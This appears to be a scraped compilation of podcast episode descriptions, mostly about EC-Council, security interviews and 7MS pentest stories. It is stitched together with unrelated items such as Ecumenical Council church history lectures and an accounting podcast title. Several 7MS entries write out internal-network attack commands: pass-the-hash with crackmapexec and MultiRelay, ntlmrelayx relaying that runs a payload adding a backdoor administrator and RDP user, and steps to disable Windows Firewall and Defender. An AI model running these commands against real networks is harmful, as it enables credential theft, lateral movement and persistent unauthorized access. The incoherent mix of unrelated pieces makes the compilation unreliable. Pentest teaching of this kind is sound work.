Todd Bell is the Chief Security & Trust Officer for Verdigris Holdings, a 100% cloud Banking as a Service (BaaS) located in Scottsdale, AZ. Todd brings more than 15+ years of information security & technology experience working at Fortune 500 global corporations to Start-up ventures. Bell is a recognized industry veteran that serves as a Subject Matter Expert (SME) for various analyst firms needing industry insights and market trends. Bell has made numerous contributions to the technology and cyber industry as CISOonline.com contributing writer and written white papers for EC Council and various organizations. Prior to Verdigris Holdings, Todd served as VP of Enterprise Architecture & CISO for Intersec Worldwide, advising corporations how to build, sustain, and operationalize cybersecurity programs at scale. Before joining Intersec Worldwide, Todd was a Customer Chief Information Security Officer for a major franchise while at Fishnet Security and worked at Verizon Business that was formerly Cybertrust. Bell holds an M.B.A. from Regis University in Denver, CO and bachelor's degree in Business Information Systems. Bell holds a variety of professional certifications consisting of Corporate Governance (SOX) from Tulane University Law School, PMP credential from Project Management Institute, Information Security (CISSP), and a certified Master Project Manager from Regis. Register for Global CISO Forum: https://globalcisoforum2020.eventbrite.com/?aff=ToddBell Register for Hacker Halted: https://hackerhalted2020.eventbrite.com
Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is all about LAPS - Microsoft's Local Administrator Password solution. In a nutshell, LAPS strengthens and randomizes the local administrator password on the systems across your enterprise. We talked about it way back in episode 252 but figured it was worth a revisit because:
- It's awesome
- It's free
- People still haven't heard of it when I share info about it during conference talks!
I've got a full write-up of how to install LAPS here. At a recent conference people asked me two awesome edge case questions:
- What if I aggressively delete inactive machines from my AD - does the LAPS attribute go with it?
- What do I do if I use Deep Freeze and the LAPS password attribute in AD keeps getting out of sync with the actual password on systems because of Deep Freeze's freeze/thaw times?
This is part three of this series - part 1 talked about a fire that destroyed my family's home and vehicles, and part 2 was about how to get "back on the grid" and start working with the insurance machine to find a new "normal." Today, I want to answer some burning questions many of you have been asking:
- Have you hit rock bottom yet? (Spoiler alert: no, but I tell you about a moment I almost lost my mind after dropping a shoe in a storm drain)
- How long do you get to keep rental cars before you have to replace your permanent vehicles?
- Do you have to stay in a hotel the whole time your house is rebuilt?
- What about if you get placed in temporary housing - do you have to rebuy your beds/furniture/clothes/etc. and keep them at your temp place, then move them again once your house is rebuilt?
- What adjustments might you want to make to your insurance policies to make sure you have the right amount of coverage in case of emergency?
Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover:
- What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward)
- A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX
- This handy script runs nmap against subnets, then Eyewitness, then emails the results to you
- Early in the engagement I'd highly recommend checking for Kerberoastable accounts
- I really like Multirelay to help me pass hashes, like: MultiRelay.py -t 1.2.3.4 -u bob.admin Administrator yourmoms.admin
- Once you get a shell, run dump to dump hashes!
- Then, use CME to pass that hash around the network! crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local-auth
- Then, check out this article to use NPS and get a full-featured shell on your targets
On this episode of Global CISO Forum, we sit down with Roota Almeida, Chief Information Security Officer at Delta Dental. A dynamic senior IT executive and CISO responsible for successful implementation of information security, risk and compliance systems and strategies across multiple industries with global operations. With more than 15 years of direct experience in [...] The post Global CISO Forum Podcast: Interview with Roota Almeida, Chief Information Security Officer at Delta Dental appeared first on EC-Council.
Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first - and only episode that Mrs. 7MS has ever listened to). Links to things discussed this episode:
Wireless pentest certs:
- SEC617 - SANS course that covers wifi pentesting (with WPA enterprise attacks)
- Offensive Security Wireless Professional
Good/free pentest training options:
- Pentester Academy
- VulnHub
- Rastalabs
- The Cyber Mentor
Free logging/alerting solutions for SMBs:
- WEFFLES
- Logging Made Easy
- HELK
- Wazuh
In this Podcast: On this episode, Amber Pedroncelli interviews Rob Johnston. The post Global CISO Forum Podcast: Interview with Rob Johnston appeared first on EC-Council.
In this Podcast: On this episode, Amber Pedroncelli interviews Michael F D Anaya, Head of Global Cyber Investigations at DEVCON. The post Global CISO Forum Podcast: Michael F D Anaya, Head of Global Cyber Investigations at DEVCON appeared first on EC-Council.
Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network. This was an especially interesting one because the client had a lot of great security defenses in place, including:
- Strong user passwords
- A SIEM solution that appeared to be doing a great job
We did some looking for pwnage opportunities such as:
- Systems missing EternalBlue patch
- Systems missing BlueKeep patch
What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for - and pass - high-priv hashes. Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.
Today's episode is a continuation of episode #379, where we:
- Conducted general nmap scans (and additional scans specifically looking for Eternal Blue)
- Sucked our nmap scans into Eyewitness
- Captured and cracked some creds with Paperspace
- Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!)
Today, the adventure continues with:
- Checking the environment for CVE-2019-1040
- Picking apart the privileges on my "pseudo domain admin" account
- Making a startling discovery about how almost all corp passwords were stored
Enjoy!
Hacker Halted is EC-Council's premier IT Security Conference held in Atlanta annually. Hacker Halted gathers 1400+ Information Security Professionals in two days of Exhibiting, Breakout Sessions, Live Hacking Demos and Keynotes! Full Show Notes: https://wiki.securityweekly.com/BSWEpisode140 To register for Hacker Halted, visit: https://securityweekly.com/hackerhalted and use the discount code HH19SW to get $100 off! Visit https://www.securityweekly.com/bsw for all the latest episodes!
In today's episode I cover some of the nasty "gotchas" I've run into when sending my pentest dropboxes around the country. Curious on how to setup your own portable pentest dropboxes (and/or pentest lab environments)? Check out part 1 and part 2 of the DIY Pentest Lab video series. Here are some of the pain points I cover today:
- Turn the firewall off: Set Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Domain Profile > Windows Firewall: Protect all network connections to Disabled. Do the same for the Standard Profile by changing Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Standard Profile > Windows Firewall: Protect all network connections to Disabled.
- Disable Windows Defender: Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender and choose Turn Off Windows Defender.
- Disable power sleep settings: To stop computers from snoozing on the job, head to Computer Configuration > Policies > Administrative Templates > System > Power Management > Sleep Settings and set Allow standby states (S1-S3) when sleeping (plugged in) to Disabled.
- Create a second disk on the Windows management VM and install BitLocker to Go
Check out today's show notes at 7ms.us for more info!
We cover a lot of ground today on a variety of topics:
- I have an Oculus Quest now and I love it. My handle is turdsquirt if you ever wanna shoot some zombies together.
- I share a story that yes, does involve poop - but only the mention of it. It's nothing like the epic tale (tail?) of my parents' dog pooping in my son's dresser drawers.
- I had a really fun pentest recently where I found some good old school SQL injection. I took to Slack to share and since then, several of you have reached out to ask how I found the vulnerability.
Here are some steps/tips I talk about on today's episode that will help:
- Watch Sunny's Burp courses on Pluralsight to enhance your Burp abilities
- Install CO2 from the BApp store
- When doing a Web app pentest, feed various fields SQL injection payloads, such as the ones in PayloadsAlltheThings
- Grab a copy of sqlmap
- Use sites like this one to help tune your sqlmap commands to find vulnerabilities.
In the end, my command I used to dump contents of important tables was this: (See today's show notes on the 7MS Web site for more information!)
Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:
- Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
    opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt
    grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt
  Source: Pwning internal networks automagically
- Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
    net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add
  So the full command would be:
    ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'
Check today's show notes at https://7ms.us for more information!
Happy belated 4th of July! Today I've got another fun tale of internal pentest pwnage that comes out of a few recent assessments I did. These tests were really fun because the clients had good defensive measures in place, such as:
- Having separate accounts for day-to-day operations and administrative/privileged tasks
- Local Administrator account largely disabled across the enterprise
- Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.)
- Hard-to-crack passwords!
Will I succeed in getting a solid foothold on this network and (hopefully) escalate to Domain Admin? Check out today's episode to find out!
In this Podcast: On this episode, Amber Pedroncelli interviews Paul Horn to discuss why everyone needs cybersecurity. The post Global CISO Forum Podcast: Everyone Needs Cyber Security appeared first on EC-Council.
In this Podcast: On this episode, Amber Pedroncelli interviews ALTR CEO Dave Sikora to talk blockchain and security, Dave's career path, and the future of blockchain. The post Global CISO Forum Podcast with ALTR CEO Dave Sikora appeared first on EC-Council.
On this episode of People of Tech, Charles is joined by [Philip Blake](https://www.linkedin.com/in/philipblakecyber/), the Country Manager (UK and EU) of [EC-Council](https://www.eccouncil.org), the world's largest certification body for Ethical Hacking and Advanced Information Security Training. Philip has been working at EC-Council since 2016. His employers are the suppliers of cybersecurity training including leadership training courses for IT professionals. In the podcast, Philip discusses his career to date, explains more about what EC-Council provide to their customers and gives his opinion on the current threat landscape in regards to how we can protect ourselves and our organisations.
In this Podcast: Host Amber Pedroncelli sits down with Thomas Vaughn to discuss Florida elections, the military to private transition, how to think about missing the technical side of security and getting your MBA. The post Global CISO Forum Podcast with Thomas Vaughn appeared first on EC-Council.
In this Podcast: Host Amber Pedroncelli sits down with Aamir Lakhani to discuss this year's Hacker Halted website. Aamir Lakhani is a leading security architect and runs the popular security blog Dr. Chaos at www.DrChaos.com. He is responsible to provide IT security solutions to major commercial and federal enterprise organizations. Lakhani has designed offensive counter [...] The post Global CISO Forum Podcast with Aamir Lakhani appeared first on EC-Council.
In this Podcast: Host Amber Pedroncelli sits down with Winn Schwartau to talk about his role in constructing the agenda for Hacker Halted 2018, the debate he will moderate at the event, and his new book “Analogue Network Security.” The post Global CISO Forum Podcast with Winn Schwartau appeared first on EC-Council.
In this Podcast: Welcome to the second series of the Global CISO Forum Podcast honoring the EC-Council CISO Awards Finalists! In the coming weeks leading up to the awards, we will be interviewing the best and brightest in infosec who have been named finalists in these categories: CISO of the Year, Certified CISO of the[...] The post Global CISO Forum Podcast Awards Series 2018: Zach Mitcham appeared first on EC-Council.
On this week's episode of C-Suite Success Radio, your host and executive coach Sharon Smith interviews Heath Renfrow, Chief Information Security Officer (CISO) for United States Army Medicine and the EC-Council 2017 CISO of the year. Heath discusses how relationships are the key to his success and shares stories about success and the obstacles along the way. You will learn how Heath defines success and the lessons he has learned to help you gain the edge you are looking for. Email: heath.renfrow@gmail.com
In this new edition of SegInfocast, guest interviewer Willian Caprino talks for the first time with Davidson Boccardo, Coordinator of Green Hat Labs and a professional with more than 10 years of experience in software analysis and protection and in reverse engineering, for a conversation about Code Analysis and Software Security. How important are code analysis and software security? Davidson points out that although there is training and awareness in information security, it is very easy to find software developed insecurely, without following best practices such as those of OWASP. To fill this gap, Clavis Segurança da Informação launched a code analysis and software security service aimed at identifying vulnerabilities in applications across their various phases: from the software's security architecture and analysis of the code, through identification of vulnerabilities associated with flaws in the deployment, configuration and operation of the software, and finally to evaluation of the application in its operating environment and the use of software protection tools. What is the relationship between this service and the development of secure applications? The service aims to identify vulnerabilities in software that has already been developed, for compliance or verification purposes, whereas secure development requires that security principles be applied from the software's conception, with the correct specification of security requirements and the correct design of a security architecture. Once secure software has been designed, it is important that the code implementation follow good secure coding practices, ensuring that typical programming flaws do not occur. Depending on the application's context, beyond secure design and coding, it is important to evaluate the environment in which the application will be exposed, so as to protect it against atypical or adverse situations while at the same time ensuring the application's correct behavior.
Revisit the other episodes presented by Davidson Boccardo: SegInfocast #19 – Computer Forensic Analysis; SegInfocast #21 – Launch of the book Guerra Cibernética; SegInfocast #23 – Computer Forensic Analysis II; SegInfocast #32 – The importance of developing secure systems, from design to production. About the interviewee: Davidson Rodrigo Boccardo holds a PhD in Electrical Engineering from the Faculdade de Engenharia de Ilha Solteira, UNESP (2009), with part of that period spent at the University of Louisiana at Lafayette, where he worked on reverse engineering of malicious artifacts at the Software Research Lab of the Computer Advanced Center Studies. Between 2010 and 2015 he coordinated the project "Software Security in Smart Meters" at the Instituto Nacional de Metrologia, Qualidade e Tecnologia (Inmetro), publishing more than 50 scientific papers. He is currently the Coordinator of the Code Analysis and Code Security Laboratory at Green Hat - Segurança da Informação. He is also an instructor at Clavis - Segurança da Informação in the Computer Forensics, Penetration Testing and Secure Development tracks. He holds the CHFI (Certified Hacker Forensic Investigator) certification from EC-Council and Secure Programming from EXIN.
Growing Your Firm | Strategies for Accountants, CPA's, Bookkeepers, and Tax Professionals
Ken Pyle is a partner of DFDR Consulting specializing in Information Security, Computer Forensics, Enterprise Virtualization and Network Engineering. Ken has an extensive background in Network Penetration and Remediation, Compliance and Secure Design. Prior to joining DFDR, he served as a Security and Network Engineer for several Information Technology companies and as the IT Director/Security Engineer of a large accounting firm. Ken has consulted with financial institutions, banks, government defense contractors and other highly secure facilities on issues of Information Security, Computer Forensics and Secure Network Design. Ken has lectured on Information Security and has published several whitepapers on subjects including public information gathering via Social Networking and Social Engineering. Ken was a featured speaker at the 2015 Computer and Enterprise Investigations Conference (CEIC). Ken is a highly rated and popular lecturer on Information Security, presenting for several professional organizations including Wolters Kluwer, Prime Global, RBMA and AGN. Ken is also a subject matter expert for Information Security, appearing in industry publications such as Accounting Today and the New Jersey Law Journal. In 2015, he was recognized as a "40 under 40" by South Jersey Business People. Holding numerous security and technology certifications from industry leaders such as Offensive Security, ISC2, Guidance Software, EC-Council, Cisco, VMware, CompTIA and AccessData, he has also published several software vulnerabilities and exploits, and is an active researcher. He is currently working on a book concentrating on Cybersecurity, Forensics and Secure Design.
Paulo Sant’anna once again welcomes Davidson Boccardo, instructor at Academia Clavis Segurança da Informação, for a conversation about Secure Development. How important is secure development from the conception of systems? Today there is a noticeable change in how companies and governments think about software security. Once seen as an add-on during software development, it is now seen as a strategy to maximize return on investment. In this podcast Davidson highlights the most exploited vulnerabilities today and emphasizes the importance of training and awareness in secure software coding practices as a way to mitigate them. How can the basic concepts of secure development be applied in real life? Davidson cites an e-commerce example in which, thanks to properly implemented Information Security controls, customers' personal information is not disclosed, product prices are not altered, and the site remains available whenever the customer wants to access it, even during periods of heavy traffic. What are the most prevalent vulnerabilities at the moment? The interviewee emphasizes the importance of awareness and training, mentioning and explaining each of the topics covered in EXIN's Secure Programming Foundation course. If you are interested in the topic, see also Webinar #28 – Exploiting Vulnerabilities in InSecure Software (an EXIN and Clavis partnership). To enroll in EXIN's official distance-learning Secure Programming Foundation course, with a voucher for the exam, follow the link. Davidson Boccardo holds a PhD in Electrical Engineering from the Faculdade de Engenharia de Ilha Solteira, with a period at the University of Louisiana, and is a specialist in malicious code analysis. He is currently a permanent faculty member of the graduate program in metrology and quality at the Instituto Nacional de Metrologia, Qualidade e Tecnologia.
He holds the CHFI certification from EC-Council and Secure Programming from EXIN. He is an instructor at Clavis Security in the computer forensics track and for the Secure Programming Foundation course.
Paulo Sant’anna welcomes Fernando Fonseca, instructor at Clavis Segurança da Informação and a professional with more than 30 years of experience in the IT market, for a conversation about the ISO 27002 standard and the EXIN ISFS ISO 27002 Foundation certification. Read the topics covered in this podcast. What is ISO 27002? Our guest explains the history of the ISO 27002 standard, its objectives, and its 15 categories of controls, which range from physical security to matters of cryptography, access control and others. EXIN and the ISFS ISO 27002 Foundation certification: Fernando notes that EXIN is known in Brazil mainly for the ITIL certification. The ISFS Foundation certification covers the fundamentals of Information Security and is recommended both for IT professionals who want to pursue a career in security and for those who only want to learn the concepts, such as auditors, developers, DBAs and even people outside IT, adding more value to companies. The course syllabus: some of the points to be covered in the course are mentioned, such as security organization, threats (hacking, social engineering) and the related protections, and much more. The course is also aimed at non-technical people. Information Security certifications: in 2013, Paulo and Fernando recorded SegInfocast #4, which dealt with careers and certifications in Information Security. Certifications attest that a professional has knowledge of the subject and are a favorable point in a job selection process. EXIN ISFS is considered the gateway to an Information Security career. Official EXIN ISFS ISO 27002 course: Fernando will be the instructor of the official EXIN ISFS ISO 27002 distance-learning course, which will be launched by Clavis in the second half of 2016.
Every student of this course will receive a voucher to take the exam online, from anywhere, through the “EXIN Anywhere” modality. Book: also in the second half of the year, the official certification book, approved by EXIN, will be launched and will serve as a self-study book. Fernando Fonseca has more than 30 years of experience in IT. He is director of education at Antebellum Capacitação Profissional and an instructor at Clavis Segurança da Informação. He is certified and qualified to teach official courses from Microsoft, Exin, EC-Council, ISACA and PCI-DSS.
In this episode I share my experience with EC-Council’s Certified Ethical Hacker training and exam. Download: 7MS #17: How to Pass the Certified Ethical Hacker Exam (audio) Show notes: Here’s info on the CEH training and test outline. I took my CEH training through UFairfax with instructor Leo Dregier. See this post I wrote that…
Episode 0x3C: You Got Breached. And in other news... April 8 is coming up FAST. Upcoming this week... Lots of News; Breaches; SCADA / Cyber, cyber... etc.; finishing it off with DERPs/Mailbag (or Deep Dive). And there are weekly Briefs - no arguing or discussion allowed. And if you've got commentary, please send it to mailbag@liquidmatrix.org for us to check out. DISCLAIMER: It's not that explicit, but you may want to use headphones if you're at work. ADDITIONAL DISCLAIMER: In case it is unclear, this is the story of 5 opinionated infosec pros who have sufficient opinions of their own they don't need to speak for anyone except themselves. Ok? Good. In this episode: News and Commentary: ErrataSec may have witnessed SHOTGIANT in action... more likely the CIA though...; Trustwave gets sued; Are You An Expert? Breaches: Hackers compromise EA website, use it to steal Apple IDs (report); Security certification group EC-Council’s website defaced with Snowden passport. SCADA / Cyber, cyber... etc: Full Disclosure is dead, long live full disclosure; XP eternal p0wnage. DERP: Wil hasn't seen 80's movies; How not to write an API; (ANTI-DERP) how to handle a vuln; (ANTI-DERP) how to handle a vuln #2. Mailbag: Dear Liquidmatrix People, Did you forget that you have a podcast? What's up with that shit? Love, The Internet. Briefly -- NO ARGUING OR DISCUSSION ALLOWED: Aviator is awesome and it should be part of your Mom's day to day; All the places you can MFA; Control System Port List; MozDef; Mylar; Frida. Liquidmatrix Staff Projects -- gratuitous self-promotion: The Security Conference Library; Contribute to the Strategic Defense Execution Standard (#SDES) and you'll be Doing Infosec Right in no time; If you're interested in helping out with openCERT.ca, drop a line to info@openCERT.ca. Upcoming Appearances -- more gratuitous self-promotion: Dave: Massively distributed diaper changing operations.
James: Interop next week, BSides of Various Cities and then Summer Security Camp. Ben: Work. Matt: Aviating. Wil: Not drinking coffee... It's beer in the mug... Other LSD Writers: That Sistrunk Guy won't write about Aegis. Advertising - pay the bills... Signing up for a SANS course? Be sure to use the code "Liquidmatrix_150" and save $150 off the course fee! Or do the math and figure out if 5% off a course would be a better deal with "Liquidmatrix_5". Closing Thoughts: Seacrest Says: If you ever want to see these liquidmatrix bastards again, follow my instructions carefully. Creative Commons license: BY-NC-SA
Welcome to Monday, May 20th 2013 as James and I discuss the last 2 weeks' worth of Information Security news and relate it (attemptively) to your enterprise day-job. This week was a bit on the lighter side, with the quote of the year (as far as I'm concerned) winner going to the Washington State Administrative Office of the Court for ...well, you'll just have to read the rest of the show notes and listen to the podcast. Also ... we are now on the Zune store. So ...to the 2 new Zune listeners - HELLO! Topics Covered: Researchers at Trend Micro uncover new cyberespionage campaign, call it SafeNet (in unrelated news SafeNet the security company had nothing to do with this...). Yet another cyberespionage campaign targeting users with revolutionary new technique called "phishing", and using a vulnerability in Microsoft software patched in April 2012, originating from ... China! - http://www.computerworld.com/s/article/9239342/Researchers_uncover_SafeNet_a_new_global_cyberespionage_operation Domain registrar, Name.com hacked, customer information including potentially usernames, email addresses, encrypted passwords (just how encrypted are we talking here? ROT13? double-XOR?), and encrypted (same question as before) credit card information potentially stolen. Again, the vector of choice is this revolutionary new technique called ... phishing - http://www.pcworld.com/article/2038263/namecom-forces-customers-to-reset-passwords-following-security-breach.html Godzilla hacked EC-Council (this needs no explanation) - http://www.esecurityplanet.com/hackers/ec-council-hacked.html Four former LulzSec members (former?) sentenced for their roles in the 2011 attacks on companies such as Sony, Nintendo, News Corp, the CIA and many others. Sentences range from a 30-month prison term for "Kayla" to 200 hours of community service for T-Flow. Justice?
Interested to hear what you think - http://www.computerworld.com/s/article/9239302/Four_former_LulzSec_members_sentenced_to_prison_in_the_UK Washington State's court system has been compromised, exposing 160,000 social security numbers and a million drivers' license numbers - basically everything you'd ever need to steal someone's identity. Luckily officials have determined that only 94 of those were definitely obtained by the attacker (what?!). Also, ridiculous quote of the year honors go to the "officials" for this: ".. officials at first believed no confidential information was leaked even though a large amount of data was downloaded from the website, the Washington State Administrative Office of the Courts said." - http://tech2.in.com/news/general/up-to-160000-social-security-numbers-exposed-in-washington-state-court-hack/872700
Video of the talk by Claire KEMP of EC-Council at Ingésup Bordeaux.
6th Ecumenical Council-681 AD reaffirms two natural energies and two natural wills of Christ taught by Pope Leo and Maximus the Confessor against the Emperor Heraclius’ Church reunion efforts using Monoenergism and Monothelitism. http://archive.org/download/OrthodoxChurchHistory/WEB_15-6th_Ec_Council_ed.mp3
4th Ecumenical Council-450 AD Condemnation of Eutychianism. 2 natures doctrine of Leo’s Tome. Monophysite schism. http://archive.org/download/OrthodoxChurchHistory/13-4th_Ec_Council.mp3
3rd Ecumenical Council-431 AD Conflict between Nestorius and Cyril of Alexandria over the term “Theotokos” and the question of who was born of Mary. http://archive.org/download/OrthodoxChurchHistory/WEB_12-3rd_Ec_Council_ed_D_WEB.mp3
ingésup has formed a partnership with the International Council of E-Commerce Consultants (EC-Council), which delivers training and certifications in the fields of e-commerce and cybersecurity. A world leader in its sector, EC-Council is notably the founder of the CEH (Certified Ethical Hacker) training and certification, which validates skills and knowledge related to information systems security.